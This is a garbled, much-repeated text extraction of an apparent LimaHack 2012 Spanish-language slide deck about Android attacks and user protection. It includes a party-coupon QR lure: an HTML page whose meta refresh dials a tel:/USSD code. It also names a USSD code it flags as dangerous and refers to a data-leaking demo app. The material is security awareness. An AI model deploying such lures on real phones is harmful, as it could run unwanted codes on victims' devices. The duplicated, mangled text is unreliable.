Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 31: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/31.jpg)
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 32: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/32.jpg)
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 33: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/33.jpg)
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 34: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/34.jpg)
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 35: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/35.jpg)
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 36: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/36.jpg)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 37: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/37.jpg)
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 38: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/38.jpg)
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 39: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/39.jpg)
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 40: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/40.jpg)
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 41: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/41.jpg)
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
